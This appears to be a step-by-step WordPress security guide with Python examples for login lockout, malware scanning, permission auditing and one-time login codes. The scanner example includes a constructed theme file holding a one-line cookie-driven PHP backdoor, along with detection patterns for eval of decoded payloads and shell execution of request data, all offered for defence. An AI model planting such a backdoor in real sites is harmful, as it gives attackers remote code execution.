The Ultimate WordPress Security Step By Step Guide
WordPress has plenty going for it, but one significant drawback is how often poorly maintained installations get compromised. If you do not keep a reasonable level of security in place for your site or blog, you are at risk.
There are ways to make your site significantly more difficult to hack, however.
If an attacker gains access to your site, they will typically inject spam links or redirects, steal data, or plant a backdoor so they can return later, none of which you want to be cleaning up.
To help, we have put together the following step-by-step guide of WordPress security measures that will help you keep unwanted guests out of your site.
Attacks That Pose A Threat
There is a range of attack styles that your WordPress website security will need to defend against, each with a different level of severity. These include:
- Brute-force logins: automated tools guess usernames and passwords against wp-login.php (and the XML-RPC endpoint) until one works, handing the attacker an administrator account and everything that comes with it
- Comment spam: bots post large volumes of comments carrying links; beyond the nuisance, the volume makes manual removal impractical, and the links damage your standing with search engines
- Outdated software: old versions of WordPress core, plugins and themes with publicly known vulnerabilities are the most common way in, because the exploits are public and scanned for automatically
- SQL injection: less common, but by far the most severe, since it lets the attacker read and modify the contents of the database, including password hashes and user accounts; in WordPress it almost always arrives through a vulnerable plugin or theme rather than core
The good news is that all of these attacks can be prevented, or at least contained. Hosting providers that specialise in WordPress also add protections tailored to it, such as a web application firewall and server-side malware scanning.
Step by step WordPress security tricks
Let's look at some things you can implement to ensure that your WordPress website security is up to scratch, all of which can provide some necessary extra layers of protection.
1. Choose a Strong Password
We'll get the most obvious one out of the way first. It seems simple enough, but you would be surprised how many people set a weak password. A strong password is one of the best ways to stop an attacker who is guessing their way into your site.
If an attacker does guess your password, they will immediately change it, lock you out and start loading malware, so make every WordPress password long, random and unique to this site (a password manager does this for you). The same goes for the database, SFTP and hosting control panel passwords. Length matters more than clever substitutions; aim for at least 12 characters and include:
- Uppercase letters
- Lowercase letters
- Numbers
- Symbols
2. Updates
As we mentioned earlier, one of the most significant risks is outdated software: plugins and themes as well as WordPress itself. Running current versions closes the publicly known holes that automated attacks look for; most compromised sites are running something with a known, already-patched vulnerability.
Attack tooling evolves constantly, and updates are how the developers respond. By default WordPress installs minor core releases (which carry the security fixes) automatically, but major releases need a manual update, and plugins and themes are not updated automatically unless you enable it for each one (possible from the Plugins and Themes screens since WordPress 5.5). Keep on top of this and apply updates when they become available, and delete any plugins or themes you are not using: deactivated code still sits on the server and can still be reached.
3. Logins
Another effective measure is limiting login attempts, which makes brute forcing your site much harder for attackers using automated tools. If you allow visitors to register, also keep the default role for new users as low as possible: Subscriber is the least privileged role, and Contributor is the most you should hand out by default, since Contributors can submit a post for review but cannot publish it or upload files.
For the logins themselves, you can use the Limit Login Attempts plugin, which does what its name suggests: after the number of failed attempts you choose, for example repeated failures against the "admin" account, the source IP address is blocked for a period you set.
You can also block IP addresses outright and review a log of failed attempts to see who has been trying to get in. Two caveats: if your site sits behind a CDN or reverse proxy, make sure the plugin reads the real client address (from the X-Forwarded-For header) rather than the proxy's, or the lockouts will hit the proxy; and remember that distributed attacks spread their guesses across many addresses, so rate limiting complements strong passwords and two-factor authentication rather than replacing them.
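As an added illustration of the brute-force attack listed above and of the lockout a limit-login plugin performs, here is a small Python model written for this page (it is not code from the Limit Login Attempts plugin or from WordPress). It replays constructed web-server log lines, treats a POST to wp-login.php answered with 200 as a failed login and one answered with 302 as a success, and locks an address out after four failures inside a window; the thresholds are assumptions you would tune to your own site:

```python
"""Per-address failed-login lockout, replayed over constructed access-log lines.
Added example for this page; the thresholds below are assumptions, not the
plugin's defaults."""
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample in combined log format. WordPress answers a failed login
# with 200 (it re-renders the form) and a successful one with 302 to wp-admin.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4321
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4321
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4321
198.51.100.9 - - [10/Mar/2024:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0
203.0.113.7 - - [10/Mar/2024:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4321
203.0.113.7 - - [10/Mar/2024:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 4321
203.0.113.7 - - [10/Mar/2024:10:00:08 +0000] "GET /wp-login.php HTTP/1.1" 200 4321
203.0.113.7 - - [10/Mar/2024:10:30:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4321
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class LoginLimiter:
    max_failures: int = 4        # failures tolerated inside the window
    window: float = 12 * 3600    # seconds over which failures are counted
    lockout: float = 20 * 60     # seconds a locked-out address is refused
    _failures: dict = field(default_factory=lambda: defaultdict(deque))
    _locked_until: dict = field(default_factory=dict)

    def is_locked(self, ip, now):
        return self._locked_until.get(ip, 0.0) > now

    def record_failure(self, ip, now):
        """Register a failed login; True if this one triggers a lockout."""
        recent = self._failures[ip]
        recent.append(now)
        while recent and now - recent[0] > self.window:
            recent.popleft()           # forget failures outside the window
        if len(recent) >= self.max_failures:
            self._locked_until[ip] = now + self.lockout
            recent.clear()             # the count restarts after the lockout
            return True
        return False

    def record_success(self, ip):
        """A real login clears the failure count for that address."""
        self._failures.pop(ip, None)


def replay(log_text, limiter=None):
    """Run wp-login.php POSTs through the limiter.

    Returns ('lockout', ip, ts) when a failure trips the limit and
    ('blocked', ip, ts) when a request arrives while the address is locked.
    """
    limiter = limiter or LoginLimiter()
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue                   # GETs only fetch the form; ignore them
        now = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
        ip = m["ip"]
        if limiter.is_locked(ip, now):
            events.append(("blocked", ip, m["ts"]))
        elif m["status"] == "302":
            limiter.record_success(ip)
        elif limiter.record_failure(ip, now):
            events.append(("lockout", ip, m["ts"]))
    return events


if __name__ == "__main__":
    for event in replay(SAMPLE_LOG):
        print(*event)
```

Run against the sample, the fourth failure from 203.0.113.7 at 10:00:06 triggers a lockout and the attempt one second later is refused, while the successful login from 198.51.100.9 is untouched. In production the same logic also needs to cover the XML-RPC endpoint, and the address it keys on must be the real client address when a proxy is in front of the site.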
4. Usernames
The default "admin" username should be changed straight away; otherwise you have handed attackers half of the credential, and every brute-force tool tries "admin" first.
To rename it directly in the database, run the following query in MySQL (the table is wp_users with the default prefix; adjust it if your installation uses another):
UPDATE wp_users SET user_login = 'newuser' WHERE user_login = 'admin';
Note that user_login is only one place the name lives: the user_nicename column is used in author archive URLs and is exposed through /?author=1 and the REST API users endpoint, so change it as well or attackers can still enumerate the real login name.
The simpler and safer alternative is to create a new account with administrator privileges, log in and test it, then delete the original "admin" account, assigning its posts to the new user when WordPress asks.
Take note that if you follow this point, the "admin" username mentioned in the last point will also need to change in your login-attempt plugin settings.
5. SSL Certificates
A TLS certificate (still usually called an SSL certificate) lets you serve your site over HTTPS, so that traffic between visitors and your server is encrypted in transit. That includes your own login credentials and session cookies, which over plain HTTP can be captured by anyone on the same network. It also provides a level of comfort for visitors, especially if you are asking for their information, and browsers now mark plain-HTTP pages as "Not secure".
Many hosts issue free certificates (for example through Let's Encrypt) from their control panel. Once the certificate is in place, change the WordPress Address and Site Address settings to https://, redirect all HTTP requests to HTTPS, and set FORCE_SSL_ADMIN to true in wp-config.php so the dashboard is never served over plain HTTP; there is also a range of plugins that handle the redirects for you.
6. WordPress Themes
As you may already have realised, there is no shortage of themes and plugins for your WordPress site, but you may not realise that not all of them are safe. Some themes contain malicious code or security holes, which is why you need to be careful when making your selections and only choose trusted themes. In particular, never install "nulled" (pirated) copies of premium themes: they are a common vehicle for backdoors and hidden spam links.
A good way to judge a theme is to read the reviews and check when it was last updated before downloading, and to buy only from established theme vendors such as MyThemeShop or Elegant Themes.
To really play it safe, search for themes through the WordPress Free Themes Directory, where submissions are reviewed, and check the developer's site. After installing a theme, run an exploit-scanner plugin to flag suspicious code, such as eval() applied to base64-encoded strings, PHP that executes request parameters, or large obfuscated blobs. Treat a clean scan as one check, not a guarantee.
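To make the "suspicious code" point concrete, here is an added Python example written for this page (it is not the code of any exploit-scanner plugin) that scans PHP theme files for the indicators such plugins typically flag. The theme files and the backdoor in them are constructed for the example, and the indicator weights are assumptions rather than a published scoring scheme:

```python
"""Static scan of PHP theme files for the constructs exploit scanners flag.
Added example; sample files and weights are constructed for this page."""
import re

# (indicator, regex, weight). Indicators, not proof: base64_decode() has
# honest uses, but eval() of a decoded blob in a theme is almost always a shell.
INDICATORS = [
    ("eval_of_decoded_payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 5),
    ("eval", re.compile(r"\beval\s*\("), 3),
    ("dynamic_code", re.compile(r"\b(?:create_function|assert)\s*\("), 3),
    # preg_replace with the /e modifier ran the replacement as PHP (removed in PHP 7)
    ("preg_replace_e_modifier",
     re.compile(r"preg_replace\s*\(\s*(['\"])[^'\"]*/[a-zA-Z]*e[a-zA-Z]*\1"), 4),
    ("shell_exec_of_request",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"), 5),
    ("decoder_call", re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), 1),
    ("long_base64_blob", re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"), 2),
]
WEIGHT = {name: weight for name, _, weight in INDICATORS}

# Constructed theme: one honest file, one planted backdoor, one opaque blob.
SAMPLE_THEME = {
    "functions.php": """<?php
// Ordinary theme setup: a menu location and a stylesheet.
add_action('after_setup_theme', function () {
    register_nav_menu('primary', 'Primary Menu');
});
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
});
""",
    "footer.php": """<?php wp_footer(); ?>
<?php
// Planted backdoor: runs whatever PHP the attacker puts in a cookie.
if (isset($_COOKIE['c'])) { eval(base64_decode($_COOKIE['c'])); }
echo '<!-- ' . str_rot13('sbbgre') . ' -->';
?>
</body></html>
""",
    "inc/helpers.php": "<?php\n// Opaque blob of the kind nulled themes ship with.\n$p = '"
                       + "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo" * 4 + "';\n",
}


def scan_php_source(source):
    """Return [(line_number, indicator)] for every suspicious construct found."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, rx, _weight in INDICATORS:
            if rx.search(line):
                findings.append((lineno, name))
    return findings


def risk_score(findings):
    return sum(WEIGHT[name] for _, name in findings)


def scan_theme(files):
    """files: {relative_path: php_source}. Returns {path: (score, findings)}
    for files with at least one finding, highest score first."""
    report = {}
    for path, source in files.items():
        findings = scan_php_source(source)
        if findings:
            report[path] = (risk_score(findings), findings)
    return dict(sorted(report.items(), key=lambda kv: (-kv[1][0], kv[0])))


if __name__ == "__main__":
    for path, (score, findings) in scan_theme(SAMPLE_THEME).items():
        print(f"{path}: score {score}")
        for lineno, name in findings:
            print(f"  line {lineno}: {name}")
```

On the sample, footer.php scores highest because a single line combines eval() with a decoder fed from a cookie, while functions.php produces nothing. A real scanner also compares core, plugin and theme files against the pristine copies from wordpress.org, which catches modifications this kind of pattern matching cannot.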
7. Access Settings
You should limit who can reach the administrative parts of your site and the files behind it on the server.
Use SFTP or SSH rather than plain FTP when transferring files: FTP sends your username and password in cleartext, so anyone on the network path can read them, whereas SFTP and SSH encrypt the whole session.
Delete your FTP account altogether if you are not using it, and if your site runs on Linux, use file permissions to decide who can read and write what. The usual safe defaults are 755 for directories and 644 for files, with wp-config.php tightened to 640 (or 600 if the web server runs as the file owner); nothing should be world-writable, and 777 is never the right answer. Keep settings locked down, especially for the folders that matter.
Further to this, folders containing sensitive material can be given an extra username and password at the web-server level. In a cPanel-style control panel this is under Security > Password Protect Directories: it lists your folders, you pick the ones you want to protect, set a username and password, and check "Password protect this directory". This puts HTTP basic authentication in front of the folder via .htaccess.
Protecting wp-admin this way is popular and effective, but note that wp-admin/admin-ajax.php is used by many plugins for logged-out visitors, so you may need to exempt that file.
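The permission rules above can be checked mechanically. The following added Python example (not from the article, a hosting control panel or WordPress) audits a directory tree for world-writable paths, an over-exposed wp-config.php and PHP files inside wp-content/uploads (where attackers commonly drop web shells), then tightens the modes. It builds a constructed sample install in a temporary directory so it runs anywhere; the 755/644/640 targets are the WordPress hardening guide's defaults, and 640 for wp-config.php assumes PHP runs in the file owner's group:

```python
"""Audit and tighten file permissions on a WordPress tree.
Added example; the 755/644/640 targets follow the WordPress hardening guide,
and the sample install below is constructed with deliberate mistakes."""
import os
import stat
import tempfile

UPLOADS = os.path.join("wp-content", "uploads") + os.sep
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def audit_permissions(root):
    """Return sorted [(relative_path, problem)] for everything under root."""
    problems = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            if mode & stat.S_IWOTH:
                problems.append((os.path.relpath(full, root),
                                 f"world-writable directory ({mode:o})"))
        for name in filenames:
            full = os.path.join(dirpath, name)
            info = os.lstat(full)
            if stat.S_ISLNK(info.st_mode):
                continue                       # judge the target, not the link
            rel = os.path.relpath(full, root)
            mode = stat.S_IMODE(info.st_mode)
            if mode & stat.S_IWOTH:
                problems.append((rel, f"world-writable file ({mode:o})"))
            if name == "wp-config.php" and mode & stat.S_IRWXO:
                # holds the database password and the authentication salts
                problems.append((rel, f"wp-config.php readable by everyone ({mode:o})"))
            if rel.startswith(UPLOADS) and name.lower().endswith(PHP_EXT):
                # uploads should hold media only; PHP here is usually a web shell
                problems.append((rel, "PHP file inside wp-content/uploads"))
    return sorted(problems)


def fix_permissions(root):
    """755 on directories, 644 on files, 640 on wp-config.php.
    Stray PHP in uploads is deliberately left for a human to inspect."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            os.chmod(os.path.join(dirpath, name), 0o755)
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):
                os.chmod(full, 0o640 if name == "wp-config.php" else 0o644)


def build_demo_tree():
    """Constructed sample install (in a temp dir) with three deliberate mistakes."""
    root = tempfile.mkdtemp(prefix="wp-audit-")

    def mkdir(rel, mode):
        path = os.path.join(root, *rel.split("/"))
        os.mkdir(path)
        os.chmod(path, mode)               # explicit, so the umask cannot interfere

    def touch(rel, mode):
        path = os.path.join(root, *rel.split("/"))
        with open(path, "w", encoding="ascii") as fh:
            fh.write("<?php\n")
        os.chmod(path, mode)

    mkdir("wp-content", 0o755)
    mkdir("wp-content/uploads", 0o777)                   # mistake 1: world-writable
    mkdir("wp-content/uploads/2024", 0o755)
    touch("index.php", 0o644)
    touch("wp-config.php", 0o644)                        # mistake 2: readable by everyone
    touch("wp-content/uploads/2024/x.php", 0o644)        # mistake 3: PHP in uploads
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for item in audit_permissions(demo):
        print("before:", *item)
    fix_permissions(demo)
    for item in audit_permissions(demo):
        print("after: ", *item)
```

After the fix only the PHP file in uploads remains on the report, which is the point: permissions can be corrected blindly, but a file that should not exist needs someone to look at it (and at how it got there). On a live server, blocking PHP execution under wp-content/uploads in the web-server configuration removes that class of problem entirely.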
8. Site Backup
It is vital that you always have your website backed up. This is handy not only if it gets hacked but also when you are changing software or updating things and need to roll back. A known-good copy of the site can prove invaluable.
A complete backup means both the database and the files (wp-content with your uploads, themes and plugins, plus wp-config.php). With those you can rebuild the site and recover its data if a compromise forces you to wipe and start fresh. Back up on a schedule that matches how often the site changes, keep several generations rather than overwriting a single copy (a backup taken after the break-in contains the attacker's backdoor too), and test a restore occasionally; a backup you have never restored is a hope, not a plan.
Store backups off the web server, for example in cloud storage. Be aware that if the server holds full credentials for the backup destination (or for your mailbox), an attacker who takes the server can delete or tamper with the backups as well, so pull backups from a separate machine, or use write-only credentials where the storage supports them.
9. Using Two-Factor Plugins
You can add another layer of security to WordPress logins with plugins that refuse to fully sign a user in until they have verified with a second factor, even after the correct password has been entered.
In the simplest form, once the password is accepted the user is emailed a one-time code, different every time and valid only for a few minutes; the session is marked as verified (a flag tied to the user's session cookie) only after the code is entered, and the mark goes away when they log out. A stolen or guessed password is then not enough on its own. Email codes are only as strong as the mailbox they land in, so where you can, prefer an authenticator app (TOTP) or a hardware security key, and make sure the second factor is enforced for every administrator account, not just your own.
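Here is what the emailed-code flow described above looks like server-side, as an added Python example (not the code of any two-factor plugin). It keeps only a keyed hash of the issued code, compares in constant time, enforces a five-minute lifetime and a limit of five wrong guesses, and voids the code once it has been used; the lifetime, guess limit and six-digit length are assumed values, and sending the email is left to the caller:

```python
"""Server side of an emailed one-time code as a second login factor.
Added example; code length, lifetime and guess limit are assumed values."""
import hashlib
import hmac
import secrets
import time

CODE_DIGITS = 6
CODE_TTL = 300        # seconds a code stays valid
MAX_TRIES = 5         # wrong guesses before the code is voided


class EmailCodeVerifier:
    """Issues a random code per login and validates it exactly once.

    Only an HMAC of the code is stored, so a leaked copy of the pending table
    does not reveal live codes. `now` is injectable so expiry can be tested.
    """

    def __init__(self, server_key: bytes, now=time.time):
        self._key = server_key
        self._now = now
        self._pending = {}     # user -> (digest, expires_at, tries_left)

    def _digest(self, user, code):
        msg = f"{user}:{code}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).digest()

    def issue(self, user):
        """Create a fresh code for `user` and return it for the caller to email.
        Re-issuing replaces the earlier code: one live code per user."""
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[user] = (self._digest(user, code), self._now() + CODE_TTL, MAX_TRIES)
        return code

    def verify(self, user, code):
        """True exactly once for the right code while it is live, else False.

        After a success, after MAX_TRIES wrong guesses, or after expiry, a new
        code must be issued. Only on True should the session be marked as
        having passed the second factor.
        """
        entry = self._pending.get(user)
        if entry is None:
            return False
        digest, expires_at, tries_left = entry
        if self._now() > expires_at:
            del self._pending[user]
            return False
        if hmac.compare_digest(digest, self._digest(user, str(code))):
            del self._pending[user]            # single use
            return True
        tries_left -= 1
        if tries_left <= 0:
            del self._pending[user]            # never allow a 10^6-guess sweep
        else:
            self._pending[user] = (digest, expires_at, tries_left)
        return False


if __name__ == "__main__":
    verifier = EmailCodeVerifier(secrets.token_bytes(32))
    sent = verifier.issue("alice")          # this is what would go in the email
    print("wrong guess accepted:", verifier.verify("alice", "000000" if sent != "000000" else "000001"))
    print("right code accepted:", verifier.verify("alice", sent))
    print("replay accepted:", verifier.verify("alice", sent))
```

The guess limit is what makes a six-digit code acceptable: without it an attacker who already has the password could simply iterate all million values within the five-minute window. When verify() returns True the application sets the verified flag on that session only; logging out destroys the session and with it the flag, so the next login has to go through the code again.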
10. Database Maintenance
There are some simple changes you can make to your WordPress database to make life harder for automated attacks. For example, every table name starts with wp_ by default, but the prefix can be changed: on a new installation set $table_prefix in wp-config.php before you run the installer; on an existing site you must rename every table and also update the prefixed keys in the options and usermeta tables (wp_user_roles, wp_capabilities, wp_user_level), and back up first, because a mistake here locks everyone out. A custom prefix defeats scripts that blindly assume wp_, but treat it as obscurity rather than a control: WordPress itself has to know the prefix, and an attacker with working SQL injection can simply read the real table names from information_schema.
Give each site its own database with a unique name and its own database user whose password is used nowhere else, so a compromise of one site does not hand over the data of another. The more distinct these identifiers and credentials are, the less an attacker gains from anything they learn elsewhere.
If You Are Hacked
All of the above advice is preventative, but what happens if the unfortunate occurs and you are hacked? Work through it in order. Put the site into maintenance mode or take it offline so visitors are not served malware. Reset every password that touches the site (WordPress accounts, the database user, SFTP/SSH and the hosting control panel) and replace the secret keys and salts in wp-config.php, which invalidates every existing login session. Check the user list for accounts you did not create and remove them. Scan the files for malicious content, and rather than cleaning in place, reinstall WordPress core, plugins and themes from fresh downloads and copy only your own content over, or restore from a backup taken before the compromise. Then find and close the way in (an outdated plugin, a weak password, a stolen FTP credential), or you will be doing this again next week. Your host can assist, and there are online services that will remove malware and repair the damage for you.
Any layer of security that you can add to your WordPress site is worthwhile. Your hosting provider has a level of responsibility in the configuration of the server to ensure the necessary security measures are in place, but you also must be diligent and ensure you keep everything up-to-date.
The extra effort you spend securing your website today can save you significant headaches tomorrow!